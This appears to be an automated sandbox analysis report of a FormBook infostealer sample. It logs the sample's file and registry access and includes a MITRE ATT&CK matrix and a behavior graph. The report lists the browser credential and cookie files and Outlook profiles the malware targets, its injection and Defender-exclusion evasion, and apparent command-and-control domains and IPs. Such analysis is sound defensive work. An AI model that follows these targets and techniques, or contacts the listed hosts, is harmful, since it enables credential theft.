                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1067799190.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337490870.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3336839914.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3337645809.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1066763202.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3342147165.00000000049E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3339789952.0000000002C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1074125583.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		612
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		131
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634642 Sample: oss4CtI8oz.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 46 www.lenzor.xyz 2->46 48 www.ethereumkeeper.xyz 2->48 50 17 other IPs or domains 2->50 60 Suricata IDS alerts for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Antivirus / Scanner detection for submitted sample 2->64 68 6 other signatures 2->68 10 oss4CtI8oz.exe 4 2->10         started        14 svchost.exe 1 1 2->14         started        signatures3 66 Performs DNS queries to domains with low reputation 48->66 process4 dnsIp5 38 C:\Users\user\AppData\...\oss4CtI8oz.exe.log, ASCII 10->38 dropped 72 Writes to foreign memory regions 10->72 74 Allocates memory in foreign processes 10->74 76 Adds a directory exclusion to Windows Defender 10->76 78 Injects a PE file into a foreign processes 10->78 17 RegSvcs.exe 10->17         started        20 powershell.exe 23 10->20         started        52 127.0.0.1 unknown unknown 14->52 file6 signatures7 process8 signatures9 54 Maps a DLL or memory area into another process 17->54 22 DzuG1v7KGGzqI4w.exe 17->22 injected 56 Loading BitLocker PowerShell Module 20->56 25 WmiPrvSE.exe 20->25         started        27 conhost.exe 20->27         started        process10 signatures11 70 Found direct / indirect Syscall (likely to bypass EDR) 22->70 29 finger.exe 13 22->29         started        process12 signatures13 80 Tries to steal Mail credentials (via file / registry access) 29->80 82 Tries to harvest and steal browser information (history, passwords, etc) 29->82 84 Modifies the context of a thread in another process (thread injection) 29->84 86 3 other signatures 29->86 32 DzuG1v7KGGzqI4w.exe 29->32 injected 36 firefox.exe 29->36         started        process14 dnsIp15 40 www.xiongding.tech 111.119.219.195, 50257, 50258, 50259 SIPL-ASSysconInfowayPvtLtdIN India 32->40 42 www.lifce.life 209.74.77.230, 50241, 50242, 50243 MULTIBAND-NEWHOPEUS United States 32->42 44 8 other IPs or domains 32->44 58 Found direct / indirect Syscall (likely to bypass EDR) 32->58 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.